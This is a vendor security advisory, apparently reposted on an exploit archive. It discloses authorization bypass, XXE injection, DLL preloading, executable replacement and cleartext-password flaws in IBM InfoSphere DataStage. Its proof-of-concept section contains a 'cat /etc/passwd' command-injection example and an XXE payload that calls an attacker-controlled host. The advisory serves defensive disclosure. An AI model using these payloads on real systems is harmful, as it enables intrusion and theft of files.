what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

IBM Infosphere Information Server / Datastage 11.5 Command Execution / Bypass

IBM Infosphere Information Server / Datastage 11.5 Command Execution / Bypass
Posted Sep 15, 2017
Authored by Samandeep Singh, Goh Zhi Hao, Mohammad Shah Bin Mohammad Esa | Site sec-consult.com

IBM Infosphere Information Server / Datastage versions 9.1, 11.3, and 11.5 (including Cloud version 11.5) suffer from bypass, XML external entity injection, DLL side loading, and various other vulnerabilities.

tags | exploit, vulnerability, xxe
advisories | CVE-2017-1383, CVE-2017-1467, CVE-2017-1468, CVE-2017-1495
SHA-256 | ea53053471a3eeb44443432b6095afa188583cf9617704a2e1f792491a59b12a

IBM Infosphere Information Server / Datastage 11.5 Command Execution / Bypass

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20170913-0 >
=======================================================================
title: Multiple Vulnerabilities
product: IBM Infosphere Information Server / Datastage
vulnerable version: 9.1, 11.3, and 11.5 (including Cloud version 11.5)
fixed version: -
CVE number: CVE-2017-1495, CVE-2017-1468, CVE-2017-1383, CVE-2017-1467
impact: Critical
homepage: http://www-03.ibm.com/software/products/en/ibminfodata
found: 2017-03-16
by: Goh Zhi Hao, Mohammad Shah Bin Mohammad Esa, Samandeep Singh
(Office Singapore)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"IBMA(r) InfoSphereA(r) DataStageA(r) integrates data across multiple systems
using a high performance parallel framework, and it supports extended
metadata management and enterprise connectivity. The scalable platform
provides more flexible integration of all types of data, including big
data at rest (Hadoop-based) or in motion (stream-based), on distributed
and mainframe platforms."

Source: http://www-03.ibm.com/software/products/en/ibminfodata


Business recommendation:
------------------------
Attackers are able to bypass authorization controls to execute system commands.
The vendor did not provide a patch but mitigation steps which have to be
implemented.

SEC Consult recommends the vendor to conduct a comprehensive security analysis,
based on security source code reviews, in order to identify all vulnerabilities
in the Remote Management platform and increase the security for its customers.


Vulnerability overview/description:
-----------------------------------
1) Weak Authorization (CVE-2017-1467)
The Administrator Client allows users with high priviledges to execute commands.
A low privileged application user can replay the same request and execute arbitrary
commands on the server.

This happens because the application links to a single linux user in the backend
server. The application privileges are based on this system user irrespective of
the user role of the application user.

Hence, any command can be executed by a low privileged application user in the
backend OS, depending on the privileges of the linux user the application is using.


2) XML eXternal Entity (XXE) Injection (CVE-2017-1383)
The Designer client allows users to import files in XML format.
By tricking the user to import an XML file with malicious XML code to the
application, it's possible to exploit an XXE vulnerability within the application.


3) DLL Preloading
Dynamic Link Library (DLL) files are loaded from the application's home directory
without being verified. This may lead to execution of arbitrary files on the system as
any users can replace the DLLs.


4) Loading Arbitrary Executables (CVE-2017-1468)
The Director and Designer Client do not check for any file signatures before loading
and executing other executable files. Existing files can be replaced by any user with
executable files, which will be executed from the toolbar.


5) Cleartext Passwords in Memory Dump (CVE-2017-1495)
User credentials are stored in clear text within the memory which can be
dumped to retrieve these credentials.


Proof of concept:
-----------------
1) Weak Authorization (CVE-2017-1467)
Any command can be injected back to the Administrator Client to execute system
commands.
Example:
==============================================================================
SH -c "cat /etc/passwd"
==============================================================================

2) XML External Entity Injection (XXE) (CVE-2017-1383)
For example by importing the following XML code, arbitrary files can be read
from the client's system. The following code generates the connection request
from the client system to attacker system.

===============================================================================
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://[IP:port]/" >]><foo>&xxe;</foo>
===============================================================================

IP:port = IP address and port where the attacker is listening for connections

Furthermore some files can be exfiltrated to remote servers via the
techniques described in:

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf

3) DLL Preloading
Removed proof of concept.

4) Loading Arbitrary Executables (CVE-2017-1468)
The following executables can be replaced to with other executable files with
the same name :
==============================================================================
Director.exe
DSDesign.exe
==============================================================================

5) Cleartext Passwords in Memory Dump (CVE-2017-1495)
Users can create a memory dump file based on the process id of the application.
User credentials can be extracted by searching it in the dump file.


Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the most recent one when
the vulnerabilities were discovered:

IBM Infosphere Datastage 11.5

IBM states that the following products are also affected:

IBM InfoSphere Information Server: versions 9.1, 11.3 and 11.5
IBM InfoSphere Information Server on Cloud: version 11.5


Vendor contact timeline:
------------------------
2017-05-23: Contacting vendor through email
(https://www-03.ibm.com/security/secure-engineering/report.html)
2017-06 - 2017-07: Coordinating with vendor to wait for their public disclosure
of fixes/mitigations. Vendor also requested for more time to get
back to us for some of the issues.
2017-07-29: Informed vendor that issue 3 will be released without proof of
concept as fix/mitigation is not available.
2017-07-31: Vendor releases mitigation stepts / workarounds
2017-09-13: Public release of advisory


Solution:
---------
No patches are available. The vendor described mitigations/workarounds for the
vulnerabilities. There is no mitigation / solution for issue 3)


Workaround:
-----------
See the following URLs by the vendor for further details regarding
mitigation steps:

1) Weak Authorization (CVE-2017-1467)
http://www-01.ibm.com/support/docview.wss?uid=swg22006063

2) XML eXternal Entity (XXE) Injection (CVE-2017-1383)
http://www-01.ibm.com/support/docview.wss?uid=swg22005803

4) Loading Arbitrary Executables (CVE-2017-1468)
http://www-01.ibm.com/support/docview.wss?uid=swg22006067

5) Cleartext Passwords in Memory Dump (CVE-2017-1495)
http://www-01.ibm.com/support/docview.wss?uid=swg22006068


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF M. Shah / @2017

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close